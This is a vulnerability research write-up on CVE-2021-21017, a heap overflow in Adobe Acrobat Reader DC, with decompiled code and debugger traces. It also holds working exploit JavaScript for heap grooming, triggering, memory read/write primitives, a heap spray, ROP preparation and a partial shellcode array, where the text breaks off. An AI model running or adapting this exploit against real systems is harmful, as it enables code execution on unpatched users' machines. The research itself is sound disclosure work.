Exodus Intelligence

Analysis of a Heap Buffer-Overflow Vulnerability in Adobe Acrobat Reader DC

28 June 2021 at 10:46

By Sergi Martinez

This post analyzes and exploits CVE-2021-21017, a heap buffer overflow reported in Adobe Acrobat Reader DC versions prior to 2021.001.20135. This vulnerability was anonymously reported to Adobe and patched on February 9th, 2021. A publicly posted proof-of-concept containing root-cause analysis was used as a starting point for this research.

This post is similar to our previous post on Adobe Acrobat Reader, which exploits a use-after-free vulnerability that also occurs while processing Unicode and ANSI strings.

Overview

A heap buffer-overflow occurs in the concatenation of an ANSI-encoded string corresponding to a PDF document’s base URL. This occurs when an embedded JavaScript script calls functions in the IA32.api module that deal with internet access, such as this.submitForm and app.launchURL. When these functions are called with a relative URL whose encoding differs from that of the PDF’s base URL, the relative URL is treated as if it had the same encoding as the base URL. This can result in copying twice the number of bytes of the source ANSI string (relative URL) into a properly-sized destination buffer, leading to both an out-of-bounds read and a heap buffer overflow.

CVE-2021-21017

Acrobat Reader has a built-in JavaScript engine based on Mozilla’s SpiderMonkey. Embedded JavaScript code in PDF files is processed and executed by the EScript.api module in Adobe Reader.

Internet access related operations are handled by the IA32.api module. The vulnerability occurs within this module when a URL is built by concatenating the PDF document’s base URL and a relative URL. This relative URL is specified as a parameter in a call to JavaScript functions that trigger any kind of Internet access, such as this.submitForm and app.launchURL. In particular, the vulnerability occurs when the encodings of the two strings differ.

The concatenation of both strings is done by allocating enough memory to fit the final string. The lengths of both strings are computed correctly, taking into account whether they are ANSI or Unicode. However, when the concatenation occurs only the base URL encoding is checked, and the relative URL is assumed to have the same encoding as the base URL. When the relative URL is ANSI encoded, the code that copies bytes from the relative URL string buffer into the allocated buffer copies them two bytes at a time instead of one byte at a time. This leads to reading a number of bytes equal to the length of the relative URL from outside the source buffer and copying them beyond the bounds of the destination buffer by the same length, resulting in both an out-of-bounds read and an out-of-bounds write vulnerability.

Code Analysis

The following code blocks show the affected parts of methods relevant to this vulnerability. Code snippets are demarcated by reference marks denoted by [N]. Lines not relevant to this vulnerability are replaced by a [Truncated] marker.

All code listings show decompiled C code; source code is not available in the affected product. Structure definitions are obtained by reverse engineering and may not accurately reflect structures defined in the source code.

The following function is called when a relative URL needs to be concatenated to a base URL. Aside from the concatenation it also checks that both URLs are valid.

__int16 __cdecl sub_25817D70(wchar_t *Source, CHAR *lpString, char *String, _DWORD *a4, int *a5)
{
  __int16 v5; // di
  CHAR v6; // cl
  CHAR *v7; // ecx
  CHAR v8; // al
  CHAR v9; // dl
  CHAR *v10; // eax
  bool v11; // zf
  CHAR *v12; // eax

[Truncated]

  int iMaxLength; // [esp+D4h] [ebp-14h]
  LPCSTR v65; // [esp+D8h] [ebp-10h]
  int v66; // [esp+DCh] [ebp-Ch] BYREF
  LPCSTR v67; // [esp+E0h] [ebp-8h]
  wchar_t *v68; // [esp+E4h] [ebp-4h]

  v68 = 0;
  v65 = 0;
  v67 = 0;
  v38 = 0;
  v51 = 0;
  v63 = 0;
  v5 = 1;
  if ( !a5 )
    return 0;
  *a5 = 0;
  if ( lpString )
  {
    if ( *lpString )
    {
      v6 = lpString[1];
      if ( v6 )
      {

[1]

        if ( *lpString == (CHAR)0xFE && v6 == (CHAR)0xFF )
        {
          v7 = lpString;
          while ( 1 )
          {
            v8 = *v7;
            v9 = v7[1];
            v7 += 2;
            if ( !v8 )
              break;
            if ( !v9 || !v7 )
              goto LABEL_14;
          }
          if ( !v9 )
            goto LABEL_15;

[2]

LABEL_14:
          *a5 = -2;
          return 0;
        }
      }
    }
  }
LABEL_15:
  if ( !Source || !lpString || !String || !a4 )
  {
    *a5 = -2;
    goto LABEL_79;
  }

[3]

  iMaxLength = sub_25802A44((LPCSTR)Source) + 1;
  v10 = (CHAR *)sub_25802CD5(1, iMaxLength);
  v65 = v10;
  if ( !v10 )
  {
    *a5 = -7;
    return 0;
  }

[4]

  sub_25802D98((wchar_t *)v10, Source, iMaxLength);
  if ( *lpString != (CHAR)0xFE || (v11 = lpString[1] == -1, v67 = (LPCSTR)2, !v11) )
    v67 = (LPCSTR)1;

[5]

  v66 = (int)&v67[sub_25802A44(lpString)];
  v12 = (CHAR *)sub_25802CD5(1, v66);
  v67 = v12;
  if ( !v12 )
  {
    *a5 = -7;
LABEL_79:
    v5 = 0;
    goto LABEL_80;
  }

[6]

  sub_25802D98((wchar_t *)v12, (wchar_t *)lpString, v66);
  if ( !(unsigned __int16)sub_258033CD(v65, iMaxLength, a5) || !(unsigned __int16)sub_258033CD(v67, v66, a5) )
    goto LABEL_79;

[7]

  v13 = sub_25802400(v65, v31);
  if ( v13 || (v13 = sub_25802400(v67, v39)) != 0 )
  {
    *a5 = v13;
    goto LABEL_79;
  }

[Truncated]

[8]

  v23 = (wchar_t *)sub_25802CD5(1, v47 + 1 + v35);
  v68 = v23;
  if ( v23 )
  {
    if ( v35 )
    {

[9]

      sub_25802D98(v23, v36, v35 + 1);
      if ( *((_BYTE *)v23 + v35 - 1) != 47 )
      {
        v25 = sub_25818CE4(v24, (char *)v23, 47);
        if ( v25 )
          *(_BYTE *)(v25 + 1) = 0;
        else
          *(_BYTE *)v23 = 0;
      }
    }
    if ( v47 )
    {

[10]

      v26 = sub_25802A44((LPCSTR)v23);
      sub_25818BE0((char *)v23, v48, v47 + 1 + v26);
    }
    sub_25802E0C(v23, 0);
    v60 = sub_25802A44((LPCSTR)v23);
    v61 = v23;
    goto LABEL_69;
  }
  v5 = 0;
  *a4 = v47 + v35 + 1;
  *a5 = -3;
LABEL_81:
  if ( v65 )
    (*(void (__cdecl **)(LPCSTR))(dword_25824088 + 12))(v65);
  if ( v67 )
    (*(void (__cdecl **)(LPCSTR))(dword_25824088 + 12))(v67);
  if ( v23 )
    (*(void (__cdecl **)(wchar_t *))(dword_25824088 + 12))(v23);
  return v5;
}

The function listed above receives as parameters a string corresponding to a base URL and a string corresponding to a relative URL, as well as two pointers used to return data to the caller. The two string parameters are shown in the following debugger output.

IA32!PlugInMain+0x168b0:
605a7d70 55              push    ebp
0:000> dd poi(esp+4) L84
099a35f0  0068fffe 00740074 00730070 002f003a
099a3600  0067002f 006f006f 006c0067 002e0065
099a3610  006f0063 002f006d 41414141 41414141
099a3620  41414141 41414141 41414141 41414141
099a3630  41414141 41414141 41414141 41414141

[Truncated]

099a37c0  41414141 41414141 41414141 41414141
099a37d0  41414141 41414141 41414141 41414141
099a37e0  41414141 41414141 41414141 2f2f3a41
099a37f0  00000000 00680074 00730069 006f002e
0:000> du poi(esp+4)
099a35f0  ".https://google.com/䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3630  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3670  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a36b0  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a36f0  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3730  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3770  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a37b0  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁㩁."
099a37f0  ""
0:000> dd poi(esp+8)
0b2d30b0  61616262 61616161 61616161 61616161
0b2d30c0  61616161 61616161 61616161 61616161
0b2d30d0  61616161 61616161 61616161 61616161
0b2d30e0  61616161 61616161 61616161 61616161

[Truncated]

0b2d5480  61616161 61616161 61616161 61616161
0b2d5490  61616161 61616161 61616161 61616161
0b2d54a0  61616161 61616161 61616161 00616161
0b2d54b0  4d21fcdc 80000900 41409090 ffff4041
0:000> da poi(esp+8)
0b2d30b0  "bbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d30d0  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d30f0  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d3110  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

[Truncated]

0b2d5430  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d5450  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d5470  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d5490  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

The debugger output shown above corresponds to an execution of the exploit. It shows the contents of the first and second parameters (esp+4 and esp+8) of the function sub_25817D70. The first parameter contains a Unicode-encoded base URL https://google.com/ (notice the 0xfeff bytes at the start of the string), while the second parameter contains an ASCII string corresponding to the relative URL. Both contain a number of repeated bytes that serve as padding to control the allocation size needed to hold them, which is useful for exploitation.

At [1] a check is made to ascertain whether the second parameter is a valid Unicode string. If an anomaly is found the function returns at [2]. The function sub_25802A44 at [3] computes the length of the string provided as a parameter, regardless of its encoding. The function sub_25802CD5 is an implementation of calloc, which allocates an array with the number of elements given in the first parameter, each of the size given in the second parameter. The function sub_25802D98 at [4] copies a number of bytes from the string specified in the second parameter to the buffer pointed to by the first parameter. Its third parameter specifies the number of bytes to be copied. Therefore, at [3] and [4] the length of the base URL is computed, a new allocation of that size plus one is performed, and the base URL string is copied into the new allocation. In an analogous manner, the same operations are performed on the relative URL at [5] and [6].

The function sub_25802400, called at [7], receives a URL or a part of it and performs some validation and processing. This function is called on both base and relative URLs.

At [8] an allocation large enough to hold the concatenation of the base URL and the relative URL is performed. The lengths provided are calculated in the function called at [7]. This is easiest to see with an example: the following debugger output shows the parameters passed to sub_25802CD5, which correspond to the number of elements to be allocated and the size of each element. In this case the size is the sum of the lengths of the base and relative URLs.

eax=00002600 ebx=00000000 ecx=00002400 edx=00000000 esi=010fd228 edi=00000001
eip=61912cd5 esp=010fd0e4 ebp=010fd1dc iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
IA32!PlugInMain+0x1815:
61912cd5 55              push    ebp
0:000> dd esp+4 L1
010fd0e8  00000001
0:000> dd esp+8 L1
010fd0ec  00002600

Continuing with the function previously listed, at [9] the base URL is copied into the memory allocated to host the concatenation and at [10] its length is calculated and provided as a parameter to the call to sub_25818BE0. This function implements string concatenation for both Unicode and ANSI strings. The call to this function at [10] provides the base URL as the first parameter, the relative URL as the second parameter and the expected full size of the concatenation as the third. This function is listed below.

int __cdecl sub_25818BE0(char *Destination, char *Source, int a3)
{
  int result; // eax
  int pExceptionObject; // [esp+10h] [ebp-4h] BYREF

  if ( !Destination || !Source || !a3 )
  {
    (*(void (__thiscall **)(_DWORD, int))(dword_258240AC + 4))(*(_DWORD *)(dword_258240AC + 4), 1073741827);
    pExceptionObject = 0;
    CxxThrowException(&pExceptionObject, (_ThrowInfo *)&_TI1H);
  }

[11]

  pExceptionObject = sub_25802A44(Destination);
  if ( pExceptionObject + sub_25802A44(Source) <= (unsigned int)(a3 - 1) )
  {

[12]

    sub_2581894C(Destination, Source);
    result = 1;
  }
  else
  {

[13]

    strncat(Destination, Source, a3 - pExceptionObject - 1);
    result = 0;
    Destination[a3 - 1] = 0;
  }
  return result;
}

In the above listing, at [11] the length of the destination string is calculated. The function then checks whether the length of the destination string plus the length of the source string is less than or equal to the desired concatenation length minus one. If the check passes, the function sub_2581894C is called at [12]. Otherwise the strncat function is called at [13].

The function sub_2581894C called at [12] implements the actual string concatenation that works for both Unicode and ANSI strings.

LPSTR __cdecl sub_2581894C(LPSTR lpString1, LPCSTR lpString2)
{
  int v3; // eax
  LPCSTR v4; // edx
  CHAR *v5; // ecx
  CHAR v6; // al
  CHAR v7; // bl
  int pExceptionObject; // [esp+10h] [ebp-4h] BYREF

  if ( !lpString1 || !lpString2 )
  {
    (*(void (__thiscall **)(_DWORD, int))(dword_258240AC + 4))(*(_DWORD *)(dword_258240AC + 4), 1073741827);
    pExceptionObject = 0;
    CxxThrowException(&pExceptionObject, (_ThrowInfo *)&_TI1H);
  }

[14]

  if ( *lpString1 == (CHAR)0xFE && lpString1[1] == (CHAR)0xFF )
  {

[15]

    v3 = sub_25802A44(lpString1);
    v4 = lpString2 + 2;
    v5 = &lpString1[v3];
    do
    {
      do
      {
        v6 = *v4;
        v4 += 2;
        *v5 = v6;
        v5 += 2;
        v7 = *(v4 - 1);
        *(v5 - 1) = v7;
      }
      while ( v6 );
    }
    while ( v7 );
  }
  else
  {

[16]

    lstrcatA(lpString1, lpString2);
  }
  return lpString1;
}

In the function listed above, at [14] the first parameter (the destination) is checked for the Unicode byte order mark (BOM) 0xFEFF. If the destination string is Unicode the code proceeds to [15]. There, the source string is appended at the end of the destination string two bytes at a time. If the destination string is ANSI, the standard lstrcatA function is called at [16].

It becomes clear that in the event that the destination string is Unicode and the source string is ANSI, for each character of the ANSI string two bytes are actually copied. This causes an out-of-bounds read of the size of the ANSI string that becomes a heap buffer overflow of the same size once the bytes are copied.
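
The effect of the loop at [15] can be reproduced in a small, self-contained model. The sketch below is not Adobe's code: it represents memory as a Uint8Array, and the function name, variable names, and byte values are hypothetical. It only assumes what the listing shows, namely that the first two source bytes are skipped as if they were a BOM and that bytes are copied in pairs until a pair of null bytes is found.

```javascript
// Toy model of the pairwise copy at [15]. All names are hypothetical.
// heap: Uint8Array standing in for process memory.
// srcStart: offset of the source string.
// dstEnd: offset where the destination string currently ends.
function copyPairsUntilWideNull(heap, srcStart, dstEnd) {
  let src = srcStart + 2; // the first two bytes are skipped as if they were a BOM
  let dst = dstEnd;
  let first, second;
  do {
    first = heap[src];
    second = heap[src + 1];
    heap[dst] = first;
    heap[dst + 1] = second;
    src += 2;
    dst += 2;
  } while (first !== 0 || second !== 0); // stops only on a two-byte terminator
  return { bytesRead: src - srcStart, bytesWritten: dst - dstEnd };
}

const heap = new Uint8Array(64);
// ANSI source "bbaaa" plus its one-byte terminator: 6 bytes at offset 0.
const ansiSource = [0x62, 0x62, 0x61, 0x61, 0x61, 0x00];
heap.set(ansiSource, 0);
// Unrelated bytes that happen to follow the source in this model.
heap.set([0x11, 0x22, 0x33, 0x44, 0x00, 0x00], ansiSource.length);

const result = copyPairsUntilWideNull(heap, 0, 32);
console.log(result.bytesRead > ansiSource.length); // true: the read ran past the source
console.log(Array.from(heap.slice(32, 32 + result.bytesWritten)));
```

In this model the single null byte that ends the ANSI string does not stop the copy, so the bytes placed after the source are carried into the destination as well.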

Exploitation

We’ll now walk through how this vulnerability can be exploited to achieve arbitrary code execution. 

Adobe Acrobat Reader DC version 2020.013.20074 running on Windows 10 x64 was used to develop the exploit. Note that Adobe Acrobat Reader DC is a 32-bit application. A successful exploit strategy needs to bypass the following security mitigations on the target:

  • Address Space Layout Randomization (ASLR)
  • Data Execution Prevention (DEP)
  • Control Flow Guard (CFG)
  • Sandbox

The exploit does not bypass the following protection mechanisms:

  • Adobe Sandbox protection: Sandbox protection must be disabled in Adobe Reader for this exploit to work. This may be done from the Adobe Reader user interface by unchecking the Enable Protected Mode at Startup option found in Preferences -> Security (Enhanced).
  • Control Flow Guard (CFG): CFG must be disabled on the Windows machine for this exploit to work. This may be done from the Exploit Protection settings of Windows 10, setting the Control Flow Guard (CFG) option to Off by default.

In order to exploit this vulnerability bypassing ASLR and DEP, the following strategy is adopted:

  1. Prepare the heap layout to allow controlling the memory areas adjacent to the allocations made for the base URL and the relative URL. This involves performing enough allocations to activate the Low Fragmentation Heap bucket for the two sizes, and enough allocations to entirely fit a UserBlock. The allocations with the same size as the base URL allocation must contain an ArrayBuffer object, while the allocations with the same size as the relative URL must have the data required to overwrite the byteLength field of one of those ArrayBuffer objects with the value 0xffff.
  2. Poke some holes in the UserBlock by nullifying the references to some of the recently allocated memory chunks.
  3. Trigger the garbage collector to free the memory chunks referenced by the nullified objects. This provides room for the base URL and relative URL allocations.
  4. Trigger the heap buffer overflow vulnerability, so the data in the memory chunk adjacent to the relative URL will be copied to the memory chunk adjacent to the base URL.
  5. If everything worked, step 4 should have overwritten the byteLength of one of the controlled ArrayBuffer objects. When a DataView object is created on the corrupted ArrayBuffer it is possible to read and write memory beyond the underlying allocation. This provides a precise way of overwriting the byteLength of the next ArrayBuffer with the value 0xffffffff. Creating a DataView object on this last ArrayBuffer allows reading and writing memory arbitrarily, but relative to where the ArrayBuffer is.
  6. Using the relative R/W primitive, walk the NT Heap structures to identify the BusyBitmap.Buffer pointer. This reveals the absolute address of the corrupted ArrayBuffer and makes it possible to build a primitive that reads from and writes to absolute addresses.
  7. To bypass DEP it is required to pivot the stack to a controlled memory area. This is done by using a ROP gadget that writes a fixed value to the ESP register.
  8. Spray the heap with ArrayBuffer objects of the correct size so they are adjacent to each other. This should place a controlled allocation at the address that the stack-pivoting ROP gadget writes to ESP.
  9. Use the arbitrary read and write to write shellcode in a controlled memory area, and to write the ROP chain to execute VirtualProtect to enable execution permissions on the memory area where the shellcode was written.
  10. Overwrite a function pointer of the DataView object used in the read and write primitive and trigger its call to hijack the execution flow.

The following sub-sections break down the exploit code with explanations for better understanding.

Preparing the Heap Layout

The size of the strings involved in this vulnerability can be controlled. This is convenient since it allows selecting the right size for each of them so they are handled by the Low Fragmentation Heap. The inner workings of the Low Fragmentation Heap (LFH) can be leveraged to increase the determinism of the memory layout required to exploit this vulnerability. Selecting a size that is not used in the program allows full control to activate the LFH bucket corresponding to it, and perform the exact number of allocations required to fit one UserBlock.

The memory chunks within a UserBlock are returned to the user randomly when an allocation is performed. The ideal layout required to exploit this vulnerability is having free chunks adjacent to controlled chunks, so when the strings required to trigger the vulnerability are allocated they fall in one of those free chunks.

In order to set up such a layout, 0xd+0x11 ArrayBuffers of size 0x2608-0x10-0x8 are allocated. The first 0x11 allocations are used to enable the LFH bucket, and the next 0xd allocations are used to fill a UserBlock (note that the number of chunks in the first UserBlock for that bucket size is not always 0xd, so this technique is not 100% effective). The ArrayBuffer size is selected so the underlying allocation is of size 0x2608 (including the chunk metadata), which corresponds to an LFH bucket not used by the application.

Then, the same procedure is done but allocating strings whose underlying allocation size is 0x2408, instead of allocating ArrayBuffers. The number of allocations to fit a UserBlock for this size can be 0xe.
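
The sizes quoted above follow from simple arithmetic. As a minimal sketch (the helper and constant names are hypothetical; the 0x10-byte ArrayBuffer metadata and the 8-byte chunk metadata are the values this post itself uses), the ArrayBuffer length and the string length used in the massageHeap listing can be derived as follows:

```javascript
// Header sizes as stated in this post; helper names are hypothetical.
const ARRAYBUFFER_HEADER = 0x10; // ArrayBuffer metadata
const CHUNK_HEADER = 0x8;        // busy heap chunk metadata

// Length to request so that the underlying chunk has the target size.
function arrayBufferLengthFor(chunkSize) {
  return chunkSize - ARRAYBUFFER_HEADER - CHUNK_HEADER;
}

// Number of two-byte characters kept for the 0x2408 strings, mirroring the
// expression (0x2408-0x8)/2 - 2 in massageHeap.
function stringLengthFor(chunkSize) {
  return (chunkSize - CHUNK_HEADER) / 2 - 2;
}

console.log(arrayBufferLengthFor(0x2608).toString(16)); // 25f0
console.log(stringLengthFor(0x2408).toString(16));      // 11fe
```

The value 0x25f0 reappears later as the base of the offset that getArbitraryRW writes to.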

The strings should contain the bytes required to overwrite the byteLength property of the ArrayBuffer that is corrupted once the vulnerability is triggered. The value that will overwrite the byteLength property is 0xffff. This does not allow leveraging the ArrayBuffer to read and write to the whole range of memory addresses in the process. It is also not possible to directly overwrite the byteLength with the value 0xffffffff, since that would require overwriting the pointer to its DataView object with a non-zero value, which would corrupt it and break its functionality. Writing only 0xffff avoids overwriting the DataView object pointer and keeps its functionality intact, because the two null bytes that follow are treated as the Unicode string terminator during the concatenation operation.

function massageHeap() {

[1]

    var arrayBuffers = new Array(0xd+0x11);
    for (var i = 0; i < arrayBuffers.length; i++) {
        arrayBuffers[i] = new ArrayBuffer(0x2608-0x10-0x8);
        var dv = new DataView(arrayBuffers[i]);
    }

[2]

    var holeDistance = (arrayBuffers.length-0x11) / 2 - 1;
    for (var i = 0x11; i <= arrayBuffers.length; i += holeDistance) {
        arrayBuffers[i] = null;
    }


[3]

    var strings = new Array(0xe+0x11);
    var str = unescape('%u9090%u4140%u4041%uFFFF%u0000') + unescape('%0000%u0000') + unescape('%u9090%u9090').repeat(0x2408);
    for (var i = 0; i < strings.length; i++) {
        strings[i] = str.substring(0, (0x2408-0x8)/2 - 2).toUpperCase();
    }


[4]

    var holeDistance = (strings.length-0x11) / 2 - 1;
    for (var i = 0x11; i <= strings.length; i += holeDistance) {
        strings[i] = null;
    }

    return arrayBuffers;
}

In the listing above, the ArrayBuffer allocations are created at [1]. Then at [2] two pointers to the created allocations are nullified in an attempt to create free chunks surrounded by controlled chunks.

At [3] and [4] the same steps are done with the allocated strings.

Triggering the Vulnerability

Triggering the vulnerability is as easy as calling the app.launchURL JavaScript function. Internally, the relative URL provided as a parameter is concatenated to the base URL defined in the PDF document catalog, thus executing the vulnerable function explained in the Code Analysis section of this document.

function triggerHeapOverflow() {
    try {
        app.launchURL('bb' + 'a'.repeat(0x2608 - 2 - 0x200 - 1 -0x8));
    } catch(err) {}
}

The size of the allocation holding the relative URL string must be the same as the one used when preparing the heap layout so that it occupies one of the freed spots, ideally with a controlled allocation adjacent to it.
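
The length passed to repeat in triggerHeapOverflow can be checked against the allocation sizes observed earlier. The following sketch assumes, based on the first debugger dump, that the base URL accounts for 0x200 bytes; the constant names are hypothetical.

```javascript
// Values taken from the trigger expression and the debugger output in this
// post; constant names are hypothetical.
const TARGET_CHUNK = 0x2608;  // chunk size of the concatenation buffer
const CHUNK_METADATA = 0x8;   // heap chunk metadata
const BASE_URL_BYTES = 0x200; // assumption: size of the base URL seen in the dump
const PREFIX = 'bb';          // the first two source bytes are skipped at [15]
const TERMINATOR = 1;         // single null byte of the ANSI string

const padding =
  TARGET_CHUNK - PREFIX.length - BASE_URL_BYTES - TERMINATOR - CHUNK_METADATA;
const relativeUrlBytes = PREFIX.length + padding + TERMINATOR;

console.log(padding.toString(16));                             // 23fd
console.log(relativeUrlBytes.toString(16));                    // 2400
console.log((BASE_URL_BYTES + relativeUrlBytes).toString(16)); // 2600
```

The last two results match the values 0x2400 and 0x2600 visible in the register dump taken at the call to sub_25802CD5.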

Obtaining an Arbitrary Read / Write Primitive

When the proper heap layout is successfully achieved and the vulnerability has been triggered, the byteLength property of an ArrayBuffer is corrupted with the value 0xffff. This allows writing past the boundaries of the underlying memory allocation and overwriting the byteLength property of the next ArrayBuffer. Finally, creating a DataView object on this last corrupted buffer allows reading from and writing to the whole memory address range of the process in a relative manner.

In order to read from and write to absolute addresses, the memory address of the corrupted ArrayBuffer must be obtained. One way of doing this is to leverage the NT Heap metadata structures to leak a pointer to the same structure. It is relevant that the chunk header contains the chunk number and that all the chunks in a UserBlock are consecutive and adjacent. In addition, the size of the chunks is known, so it is possible to compute the distance from the origin of the relative read and write primitive to the pointer to leak. Likewise, since the distance is known, once the pointer is leaked the distance can be subtracted from it to obtain the address of the origin of the read and write primitive.

The following function implements the process described in this subsection.

function getArbitraryRW(arrayBuffers) {

[1]

    for (var i = 0; i < arrayBuffers.length; i++) {
        if (arrayBuffers[i] != null && arrayBuffers[i].byteLength == 0xffff) {
            var dv = new DataView(arrayBuffers[i]);
            dv.setUint32(0x25f0+0xc, 0xffffffff, true);
        }
    }

[2]

    for (var i = 0; i < arrayBuffers.length; i++) {
        if (arrayBuffers[i] != null && arrayBuffers[i].byteLength == -1) {
            var rw = new DataView(arrayBuffers[i]);
            corruptedBuffer = arrayBuffers[i];
        }
    }

[3]

    if (rw) {
        var chunkNumber = rw.getUint8(0xffffffff+0x1-0x13, true);
        var chunkSize = 0x25f0+0x10+8;

        var distanceToBitmapBuffer = (chunkSize * chunkNumber) + 0x18 + 8;
        var bitmapBufferPtr = rw.getUint32(0xffffffff+0x1-distanceToBitmapBuffer, true);

        startAddr = bitmapBufferPtr + distanceToBitmapBuffer-4;
        return rw;
    }
    return rw;
}

The function above at [1] tries to locate the initial corrupted ArrayBuffer and leverages it to corrupt the adjacent ArrayBuffer. At [2] it tries to locate the recently corrupted ArrayBuffer and build the relative arbitrary read and write primitive by creating a DataView object on it. Finally, at [3] the aforementioned method of obtaining the absolute address of the origin of the relative read and write primitive is implemented.

Once the origin address of the read and write primitive is known it is possible to use the following helper functions to read and write to any address of the process that has mapped memory.

function readUint32(dataView, absoluteAddress) {
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    }
    return dataView.getUint32(addrOffset, true);
}

function writeUint32(dataView, absoluteAddress, data) {
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    }
    dataView.setUint32(addrOffset, data, true);
}
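
The offset adjustment in these helpers is a 32-bit wrap-around: an address below startAddr produces a negative difference, which is mapped to the equivalent unsigned 32-bit offset. A minimal sketch of that arithmetic in isolation, with a made-up origin address and a hypothetical helper name:

```javascript
// Hypothetical helper isolating the offset computation used by
// readUint32 and writeUint32. The addresses below are made up.
function toRelativeOffset(absoluteAddress, originAddress) {
  let offset = absoluteAddress - originAddress;
  if (offset < 0) {
    offset += 0x100000000; // same as adding 0xffffffff + 1
  }
  return offset;
}

const exampleOrigin = 0x20000000;
console.log(toRelativeOffset(0x20000010, exampleOrigin).toString(16)); // 10
console.log(toRelativeOffset(0x1ffffff8, exampleOrigin).toString(16)); // fffffff8
// For 32-bit inputs an unsigned right shift by zero gives the same result.
console.log(((0x1ffffff8 - exampleOrigin) >>> 0).toString(16));        // fffffff8
```

The second result equals the expression 0xffffffff+0x1-0x8 that the exploit code uses to address the 8 bytes located just before the origin.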

Spraying ArrayBuffer Objects

The heap spray technique performs a large number of controlled allocations with the intention of having adjacent regions of controllable memory. The key to obtaining adjacent memory regions is to make the allocations of a specific size.

In JavaScript, a convenient way of making allocations in the heap whose content is completely controlled is by using ArrayBuffer objects. The memory allocated with these objects can be read from and written to with the use of DataView objects.

In order to get a heap allocation of the right size, the metadata of ArrayBuffer objects and heap chunks has to be taken into consideration. The internal representation of ArrayBuffer objects shows that the size of the metadata is 0x10 bytes. The size of the metadata of a busy heap chunk is 8 bytes.

Since the objective is to have adjacent memory regions filled with controlled data, the allocations performed must have the exact same size as the heap segment size, which is 0x10000 bytes. Therefore, the ArrayBuffer objects created during the heap spray must be of 0xffe8 bytes.

function sprayHeap() {
    var heapSegmentSize = 0x10000;

[1]

    heapSpray = new Array(0x8000);
    for (var i = 0; i < 0x8000; i++) {
        heapSpray[i] = new ArrayBuffer(heapSegmentSize-0x10-0x8);
        var tmpDv = new DataView(heapSpray[i]);
        tmpDv.setUint32(0, 0xdeadbabe, true);
    }
}

The exploit function listed above performs the ArrayBuffer spray. The total size of the spray defined in [1] was determined by setting a number high enough so an ArrayBuffer would be allocated at the selected predictable address defined by the stack pivot ROP gadget used.

The purpose of these allocations is to have a controllable memory region at the address where the stack is relocated after the stack pivot executes. This area can be used to prepare the call to VirtualProtect that enables execution permissions on the memory page where the shellcode is written.

Hijacking the Execution Flow and Executing Arbitrary Code

With the ability to arbitrarily read and write memory, the next steps are preparing the shellcode, writing it, and executing it. The security mitigations present in the application determine the strategy and techniques required. ASLR and DEP force using Return Oriented Programming (ROP) combined with leaked pointers to the relevant modules.

Taking this into account, the strategy can be the following:

  1. Obtain pointers to the relevant modules to calculate their base addresses.
  2. Pivot the stack to a memory region under our control where the addresses of the ROP gadgets can be written.
  3. Write the shellcode.
  4. Call VirtualProtect to change the shellcode memory region permissions to allow execution.
  5. Overwrite a function pointer that can be called later from JavaScript.

The following functions are used in the implementation of the mentioned strategy.

[1]

function getAddressLeaks(rw) {
    var dataViewObjPtr = rw.getUint32(0xffffffff+0x1-0x8, true);

    var escriptAddrDelta = 0x275518;
    var escriptAddr = readUint32(rw, dataViewObjPtr+0xc) - escriptAddrDelta;

    var kernel32BaseDelta = 0x273eb8;
    var kernel32Addr = readUint32(rw, escriptAddr + kernel32BaseDelta);

    return [escriptAddr, kernel32Addr];
}
 
[2]

function prepareNewStack(kernel32Addr) {

    var virtualProtectStubDelta = 0x20420;
    writeUint32(rw, newStackAddr, kernel32Addr + virtualProtectStubDelta);

    var shellcode = [0x0082e8fc, 0x89600000, 0x64c031e5, 0x8b30508b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0x3cacff31,
        0x2c027c61, 0x0dcfc120, 0xf2e2c701, 0x528b5752, 0x3c4a8b10, 0x78114c8b, 0xd10148e3, 0x20598b51,
        0x498bd301, 0x493ae318, 0x018b348b, 0xacff31d6, 0x010dcfc1, 0x75e038c7, 0xf87d03f6, 0x75247d3b,
        0x588b58e4, 0x66d30124, 0x8b4b0c8b, 0xd3011c58, 0x018b048b, 0x244489d0, 0x615b5b24, 0xff515a59,
        0x5a5f5fe0, 0x8deb128b, 0x8d016a5d, 0x0000b285, 0x31685000, 0xff876f8b, 0xb5f0bbd5, 0xa66856a2,
